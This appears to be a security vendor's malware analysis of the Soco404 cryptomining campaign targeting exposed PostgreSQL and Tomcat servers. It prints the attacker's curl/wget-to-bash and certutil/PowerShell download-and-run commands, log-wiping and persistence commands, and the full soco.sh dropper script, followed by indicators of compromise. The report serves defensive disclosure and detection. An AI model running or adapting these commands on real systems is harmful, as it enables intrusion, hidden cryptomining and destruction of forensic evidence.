TL;DR
Wiz research has observed an active campaign exploiting various vulnerabilities and misconfigurations across cloud environments to deploy cryptominers.
In the variant described in the blog, the attacker exploited misconfigurations in PostgresSQL.
The attacker targets both Linux and Windows systems, deploying platform-specific malware.
They use process masquerading to disguise malicious activity as legitimate system processes.
They achieve persistence via cron job and shell initialization files (e.g.,
.bashrc,.profile).They rely on compromised legitimate servers to host and deliver malware.
The malware spawns multiple child processes that communicate via local sockets.
Payloads are embedded in fake 404 HTML pages hosted on websites built using Google Sites. Note: We reported these sites to Google, and they have since been taken down.
We estimate that this campaign is part of a broader crypto-scam infrastructure.
Wiz Research has identified a new iteration of a broader malicious cryptomining campaign, which we’ve dubbed Soco404 (based on the observed payload name, associated domain, and use of fake error pages). While previous activity tied to this campaign has been documented by Aqua and Imperva as targeting exposed Apache Tomcat services with weak credentials , as well as vulnerable Apache Struts and Atlassian Confluence servers, our investigation uncovered a distinct case in which the attacker also targets exposed PostgreSQL instances and leverages compromised Apache Tomcat servers to host payloads tailored for both Linux and Windows environments. We also found evidence that the attacker is maintaining a broader crypto-scam infrastructure, further suggesting this is part of a long-term, versatile, and opportunistic operation.
The threat actor behind Soco404 has leveraged multiple types of infrastructure, which we have grouped into three distinct clusters:
Fake 404 Domains - Registered domains that display fake 404 error pages while embedding malicious payloads directly within the HTML content.
Crypto-Scam Websites - Domains used to host fraudulent cryptocurrency trading platforms, likely as part of a broader social engineering effort.
Compromised Infrastructure - Legitimate servers compromised via vulnerable Apache Tomcat instances, used to host and distribute malware payloads. Notably, the attacker has successfully compromised a legitimate Korean transportation website, demonstrating their ability to abuse trusted infrastructure for malicious purposes.
As mentioned in our previous blog post on PostgreSQL cryptojacking, our data shows that nearly 90% of cloud environments self-host PostgreSQL instances, and one-third of those have at least one instance publicly exposed to the internet. These exposed PostgreSQL servers are frequently targeted by threat actors, making them a high-risk attack surface.
In this writeup, we detail the Soco404 campaign, share IoCs, and provide insight into its ongoing activity. Based on the dynamic number of workers linked to the attacker’s crypto wallet within the mining pool, the campaign appears to still be active.
Technical Analysis
PostgreSQL Exploitation
Threat actors are actively scanning for accessible services [T1110.003] that allow unauthenticated or low-effort entry points, with PostgreSQL frequently appearing in attack flows due to its prevalence and default configurations. Upon gaining access, attackers abuse PostgreSQL’s COPY ... FROM PROGRAM functionality to achieve remote code execution [T1190], enabling them to retrieve and execute malicious payloads directly on the host [T1059.004].
The attacker behind Soco404 appears to be conducting automated scans for exposed services, aiming to exploit any accessible entry point. Their use of a wide range of ingress tools, including Linux utilities like wget and curl, as well as Windows-native tools such as certutil and PowerShell, highlights an opportunistic strategy. Rather than relying on a single method or operating system, the attacker casts a wide net, deploying whichever tool or technique is available in the environment to deliver their payload. This flexible approach is characteristic of a broad, automated cryptomining campaign focused on maximizing reach and persistence across varied targets.
In the following sections we will detail both Linux and Windows payloads.
Linux payload
Upon successful exploitation the attacker runs the soco.sh script directly in memory, avoiding disk writes.
sh -c "(curl http://<compromised-service>:8080/soco.sh||wget -q -O- http://<compromised-service>:8080/soco.sh||cc http://<compromised-service>:8080/soco.sh||ww -q -O- http://<compromised-service>:8080/soco.sh)|bash"soco.sh
soco.sh is a dropper script that is in charge of setting the ground for the main payload. Key points:
1.Download & execute payload from http://<compromised-service>:8080/app2 [T1105]. The script generates a random filename based on the timestamp and drops it into a writable directory on disk, explicitly avoiding /tmp and /sys, likely for persistence or evasion purposes. Next, the script will run the sleep command for 2 seconds and then delete the binary from disk to minimize its footprint [T1070.004]. The server hosting the payload is a compromised [T1584.004], publicly accessible Apache Tomcat instance. Based on Aqua’s findings, it is likely that the attacker gained access via weak credentials, though exploitation of the CVE-2025-24813 vulnerability [T1190] is also a possible entry vector given the versions in use.
In the following section, we detail the behavior of the downloaded payload.
2. Eliminate potential competing miners by clearing /etc/ld.so.preload, remove suspicious cron jobs, and forcefully killing processes with separate mount namespaces.
chattr -ia /etc/ld.so.preload
cat /dev/null > /etc/ld.so.preload
crontab -l | sed '/\.bashgo\|pastebin\|onion\|bprofr\|python\|curl\|wget\|\.sh/d' | crontab -
cat /proc/mounts | awk '{print $2}' | grep -P '/proc/\d+' | grep -Po '\d+' | xargs -I % kill -9 %3. Remove evidence of execution and reduce forensic visibility by overwriting logs including cron and wtmp [T1070.002]:
echo 0>/var/spool/mail/root
echo 0>/var/log/wtmp
echo 0>/var/log/secure
echo 0>/var/log/cron4. If the script is running as root, it will attempt to optimize memory performance and Maximize CPU efficiency for cryptomining.
*See full soco.sh script in Archive section below.
Malware execution flow
The binary app2 (14bf32e780601c6870811982648cf293) is a UPX [T1027.002] packed Go binary obfuscated [T1027] using Garble to hinder analysis. Its primary function is to act as a loader for the main payload.
Upon execution, the malware unpacks itself into memory and spawns multiple child processes. One of these processes is responsible for re-executing the binary under the name (sd-pam), in an attempt to masquerade [T1036.005] as the legitimate systemd user service that handles PAM (Pluggable Authentication Modules) sessions on Linux systems.
After this, it reaches out to the command-and-control (C2) server at https[:]//www[.]fastsoco[.]top, which hosts the main payload at https[:]//www[.]fastsoco[.]top/1.
This website is based on Google Sites (https[:]//sites[.]google[.]com/view/2025soco/), which, when accessed, displays a fake 404 error page [T1583.006]. The actual binary is embedded within the HTML content [T1027.006] as a base64-encoded blob, which is extracted by searching for content between the markers exe101 and exe101.
The main payload is executed with the names [cpuhp/1] and [kworker/R-rcu_p] to masquerade as kernel related processes [T1036.005].
It establishes the following persistence:
1.Crontab
A new cron job is added to run the malware every minute [T1053.003]:
/bin/bash -c "(crontab -l 2>/dev/null; echo \"*/1 * * * * /etc/postgresql/<random-binary-name>\") | crontab -"
2. Shell initialization files
The following command is appended to /etc/profile, .bashrc, and .profile [T1546.004]:
echo My>/dev/null 2>&1 &<chosen-payload-directory>/<random-binary-name> >/dev/null 2>&1 &During execution, the malware creates multiple forked processes and drops additional copies of itself to disk using randomly generated filenames. These processes interact with each other via local socket communication [T1559], likely to coordinate functionality or monitor each other for resilience.
Once established, it begins cryptocurrency mining [T1496] by connecting to the pools c3pool and moneroocean, using the following wallet address:
8BmVXbfsnRsiyPfUxsfnyyA9LqXvUsF2DYBX3wUmCEtejnBMyTiXe3XDCvq4REjmviEc5J1gomsnv7e4wYy1c5Pz3VadeyZWindows payload
The Windows initial post exploitation command is designed to download and execute a Windows binary (ok.exe) from the compromised server using multiple fallback methods to maximize the chances of successful execution. It begins by invoking certutil, a legitimate Windows utility originally intended for managing certificates, which also includes functionality for downloading files from URLs. Attackers frequently abuse certutil because it is built-in, commonly allowed by endpoint defenses, and can fetch and save remote payloads without raising immediate suspicion. If certutil fails or is blocked, the command falls back to using PowerShell’s Invoke-WebRequest, and finally to curl [T1105], each attempting to download the file to C:\Users\Public\ directory, a universally writable path, and execute it.
sh -c " cmd /c \"certutil -urlcache -split -f \"http://<compromised-service>:8080/ok.exe\" \"C:\Users\Public\os.exe\" && \"C:\Users\Public\os.exe\" || powershell -c \"iwr 'http://<compromised-service>:8080/ok.exe' -OutFile 'C:\Users\Public\os.exe'; Start-Process 'C:\Users\Public\os.exe'\" || curl -o \"C:\Users\Public\os.exe\" \"http://<compromised-service>:8080/ok.exe\" && \"C:\Users\Public\os.exe\"\""The ok.exe binary functions as a loader that embeds both the main payload and the WinRing0.sys driver. Upon execution, it copies itself to C:\ProgramData\fuekghfebdot\hunyknsmqtgn.exe or C:\ProgramData\ blbsihkzkqxm\wytourcabiik.exe and establishes persistence by creating a service [T1543.003] with a random 8-character uppercase alphabetical name:
sc.exe create "XXXXXXXX" binpath= "C:\ProgramData\blbsihkzkqxm\wytourcabiik.exe" start= "auto"It then attempts to cover its tracks by stopping the Windows event log service [T1562.002]:
sc.exe stop eventlogTo remove evidence of the original binary, the malware executes a self-deletion command [T1027.002]. It uses the choice command to introduce a 3-second delay before deleting the file.
cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Public\os.exe"Afterward, it spawns a conhost.exe process and injects the main payload into it, [T1055], creating multiple threads that communicate via TCP sockets [T1559]. It also drops the WinRing0.sys driver with a random name to the temp directory. WinRing0.sys is a component commonly used by cryptominers like XMRig to gain low-level access to system resources and improve performance.
The malware ultimately begins mining cryptocurrency [T1496] using the same wallet that was used by the Linux payload.
Possible connection to crypto scam campaign
During our analysis, we identified that one of the attacker’s payloads was hosted on a fake cryptocurrency exchange website, seeyoume[.]top, which claimed affiliation with the Hong Kong Stock Exchange (HKEX). When accessing seeyoume[.]top/sol, we received a fake 404 error page that embedded the same shell script seen in the previously documented instances of the campaign.
Further investigation into the domain led us to a Russian scam alert website, which linked seeyoume[.]top to a broader crypto-scam operation and detailed the scam’s workflow. The alert also referenced additional domains associated with the scam;
arcticoins[.]comdiamondcapitalcrypro[.]comnordicicoins[.]comhkcapitals[.]com
diamondcapitalcrypro[.]com was still live and hosted nearly identical fake crypto exchange website, reinforcing the likelihood of a coordinated scam infrastructure.
How can Wiz help?
Prevention:
The Wiz Dynamic Scanner detects publicly exposed PostgreSQL services configured with weak or default credentials within customers' cloud environments. The Wiz agentless workload scanner detects containers and VMs hosting PostgreSQL and identifies if they contain sensitive data or have access to highly privileged service accounts (which could just as easily be abused by opportunistic attackers for purposes other than cryptojacking).
Detection:
The Wiz Runtime Sensor detects events and behaviors associated with this threat and similar ones, alerting you as the adversary progresses through the attack kill chain: from the exploit to the initial payload delivery, persistence creations and ultimately to the final cryptomining activity.
Below is an example of the initial access vector identified by the detection 'Anomalous shell execution by a database process':
Archive
soco.sh script:
#!/bin/bash
cc=http://<compromised-server>:8080/app2
sys=$(date|md5sum|awk -v n="$(date +%s)" '{print substr($1,1,n%7+6)}')
get() {
curl -k $1>$2 || cc -k $1>$2 || wget --no-check-certificate -q -O- $1>$2 || curl $1>$2 || curl $1>$2 || ww -q -O- $1>$2
chmod +x $2
}
chattr -ia /etc/ld.so.preload
cat /dev/null > /etc/ld.so.preload
crontab -l | sed '/\.bashgo\|pastebin\|onion\|bprofr\|python\|curl\|wget\|\.sh/d' | crontab -
cat /proc/mounts | awk '{print $2}' | grep -P '/proc/\d+' | grep -Po '\d+' | xargs -I % kill -9 %
if [ `whoami` = "root" ];then
yy
tt
else
echo "error root!"
fi
readDir() {
local u=$(whoami)
local dir=$(find /home /root /opt /usr /var /etc -type d -user "$u" -writable -perm -u=wx \
-not -path '/sys/*' -not -path '/tmp/*' -print -quit 2>/dev/null)
[[ -n "$dir" ]] && echo "$dir" || echo "/var/tmp"
}
dirs=$(readDir)
echo "file ok: $dirs"
cd -- "$dirs" || exit 1
PATH=".:$PATH"
get $cc $sys
$sys
sleep 2
rm -rf $sys
echo 0>/var/spool/mail/root
echo 0>/var/log/wtmp
echo 0>/var/log/secure
echo 0>/var/log/cron
function yy() {
sysctl -w vm.nr_hugepages=$(nproc)
for i in $(find /sys/devices/system/node/node* -maxdepth 0 -type d);
do
echo 3 > "$i/hugepages/hugepages-1048576kB/nr_hugepages";
done
echo "1GB pages successfully enabled"
}
function tt() {
MSR_FILE=/sys/module/msr/parameters/allow_writes
if test -e "$MSR_FILE"; then
echo on > $MSR_FILE
else
modprobe msr allow_writes=on
fi
if grep -E 'AMD Ryzen|AMD EPYC' /proc/cpuinfo > /dev/null;
then
if grep "cpu family[[:space:]]\{1,\}:[[:space:]]25" /proc/cpuinfo > /dev/null;
then
if grep "model[[:space:]]\{1,\}:[[:space:]]97" /proc/cpuinfo > /dev/null;
then
echo "Detected Zen4 CPU"
wrmsr -a 0xc0011020 0x4400000000000
wrmsr -a 0xc0011021 0x4000000000040
wrmsr -a 0xc0011022 0x8680000401570000
wrmsr -a 0xc001102b 0x2040cc10
echo "MSR register values for Zen4 applied"
else
echo "Detected Zen3 CPU"
wrmsr -a 0xc0011020 0x4480000000000
wrmsr -a 0xc0011021 0x1c000200000040
wrmsr -a 0xc0011022 0xc000000401500000
wrmsr -a 0xc001102b 0x2000cc14
echo "MSR register values for Zen3 applied"
fi
else
echo "Detected Zen1/Zen2 CPU"
wrmsr -a 0xc0011020 0
wrmsr -a 0xc0011021 0x40
wrmsr -a 0xc0011022 0x1510000
wrmsr -a 0xc001102b 0x2000cc16
echo "MSR register values for Zen1/Zen2 applied"
fi
elif grep "Intel" /proc/cpuinfo > /dev/null;
then
echo "Detected Intel CPU"
wrmsr -a 0x1a4 0xf
echo "MSR register values for Intel applied"
else
echo "No supported CPU detected"
fi
}
IOCs
| Indicator | Description |
|---|---|
| c9bb137d56fab7d52b3dbc85ae754b79d861a118bfb99566faaa342c978285ff | SHA-256 soco.sh |
| bac4b166dec1df8aa823a15136c82c8b50960b11a0c4da68b8d7dedcb0f3a794 | SHA-256 soco.sh |
| c67e876d7b3ae5f3c4fd626d8ba62e77bd47dfdf51f7a4438edd64bd0f88ce3a | SHA-256 soco.sh |
| 039caa15c1a54b49250717e68cd1a78a4be17b80e8062441c340eba0674e5926 | SHA-256 of ldr.sh |
| 0ad013c5166900b9c57a7ff771dbbf8b11f8a3be46a85cff6ced83ceb1a38f8d | SHA-256 of ldr.sh |
| 5a8e5d7dfc7ccadf8b66fa8b04cf33010f0384072fc9b1fc79e7e1a65a0c701c | SHA-256 of ldr.sh |
| 9055bcd42263d83943358f76b13cdf24079ef9db8a2167658089be5324279485 | SHA-256 of ldr.sh |
| a1fbaee0915edd8568fcea9868fd511adb43faf93bd0abd63788a61febcff13b | SHA-256 of ldr.sh |
| 09e7232ef9322792f6340cc637d3ba2292383c2d353196252bd7a3cf00f4ba0e | SHA-256 of ldr.sh |
| d62c4c621de5e6deee28454413c612cd99511aaa85f9722c1ebadc731d22cab2 | SHA-256 of ldr.sh |
| e7fe0a5c6c198be8941d5a1be7c0669688c45751e9bf0d16a0ae6ae1d0e7a957 | SHA-256 of ELF malware |
| e69e55027bf64011599ae1283d15d157bfefed1c03e20fe72ecf7e90fd451e76 | SHA-256 of ELF malware |
| 424f15e2509ed62c95d5637df0b519c40f73b3cbb00b7a8073ba89ddad7e5dc1 | SHA-256 of ELF malware |
| 22abd35b6afd1909e6d71bd75b2ac23890e2675f9d40e403b0cfd4ed155a96f6 | SHA-256 of ELF malware |
| cbb9d5c601fca0b9b25ec914431abc35c45d5f4c2bbf18e14661aadd8e7e2f47 | SHA-256 of ELF malware |
| 68bb9e294ba7f1b0426e16abbdb5c8f29daa8e8d98aee7a430ead97f2ffadd3a | SHA-256 of ELF malware |
| 8739f0189f64636fab1965bb066ba67a980ecabafd4307f4fb732ffdc154fa04 | SHA-256 of ELF malware |
| 54303aa4f7b7ae3137f5f1368dba6b9b90f7826b8b18132ea495fff29f33f1e4 | SHA-256 of ELF malware |
| 13e3cb74ad420c0770b9fedae617eaf312272db12035e4f64ebb606ac96f6ef0 | SHA-256 of ELF malware |
| 498ecdfce65d739154b39703c63c8f4334066655e1cc8024c2716e280598cacc | SHA-256 of ok.exe Windows malware |
| 8d06979a38ee5ef6f03817a1d16ab75171528cfaf8f743bfe64b45abd6c26142 | SHA-256 of ok.exe Windows malware |
| bf038c13468a9b75278ea198c3d41d4ad4fc14e447d9dd0a94915ce2ab8132e5 | SHA-256 of ok.exe Windows malware |
| a047e82948bf7c43281c975b9588bf5d4500fd671a5e25fc3f9206cbd1827dfd | SHA-256 of ok.exe Windows malware |
| 5b224a091151661943e038066ef03f7b5bab055187f3b1b582dbfe392e74c921 | SHA-256 of appx.exe Windows malware |
| 0086fe6259af25f3b5a12d81080bed61938cc70ebdf480501acc1c10ac39c74a | SHA-256 of os.exe Windows malware |
| 11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5 | SHA-256 of WinRing0.sys |
| https[:]//sites[.]google[.]com/view/2025soco/ | Payload hosting site |
| https://sites[.]google[.]com/view/dblikes | Payload hosting site |
| https://sites[.]google[.]com/view/sogoto | Payload hosting site |
| https://sites[.]google[.]com/view/osk05 | Payload hosting site |
| www[.]fastsoco[.]top | Payload hosting site |
| dblikes[.]cyou | Payload hosting site |
| seeyoume[.]top | Payload hosting site |
| arcticoins[.]com | Crypto scam domain |
| diamondcapitalcrypro[.]com | Crypto scam domain |
| nordicicoins[.]com | Crypto scam domain |
| hkcapitals[.]com | Crypto scam domain |
| auto.c3pool.org | Mining pool |
| gulf.moneroocean.stream | Mining pool |
| 483F2xjkCUegxPM7wAexam1Be67EqDRZpS7azk8hcGETSustmuxd1Agffa3XSHFyzeFprLyHKm37bTPShFUTKgctMSBVuuK | Attacker’s crypto wallet address |
| 8BmVXbfsnRsiyPfUxsfnyyA9LqXvUsF2DYBX3wUmCEtejnBMyTiXe3XDCvq4REjmviEc5J1gomsnv7e4wYy1c5Pz3VadeyZ | Attacker’s crypto wallet address |
MITRE ATT&CK® Techniques used by Soco404
Command and Control - Ingress Tool Transfer (T1105)
Credential Access - Brute Force: Password Spraying (T1110.003)
Defense Evasion - Impair Defenses: Disable Windows Event Logging (T1562.002)
Defense Evasion - Indicator Removal: Clear Linux or Mac System Logs (T1070.002)
Defense Evasion - Indicator Removal: File Deletion (T1070.004)
Defense Evasion - Masquerading: Match Legitimate Name or Location (T1036.005)
Defense Evasion - Obfuscated Files or Information (T1027.002)
Defense Evasion - Obfuscated Files or Information: HTML Smuggling (T1027.006)
Defense Evasion - Obfuscated Files or Information: Software Packing (T1027.002)
Defense Evasion - Process Injection (T1055)
Execution - Command and Scripting Interpreter: Unix Shell (T1059.004)
Execution - Inter-Process Communication (T1559)
Initial Access - Exploit Public-Facing Application (T1190)
Impact – Resource Hijacking (T1496)
Persistence - Create or Modify System Process: Windows Service (T1543.003)
Persistence - Scheduled Task/Job: Cron (T1053.003)
Persistence - Event Triggered Execution: Unix Shell Configuration Modification (T1546.004)
Resource Development - Acquire Infrastructure: Web Services (T1583.006)
Resource Development - Compromise Infrastructure: Server (T1584.004)
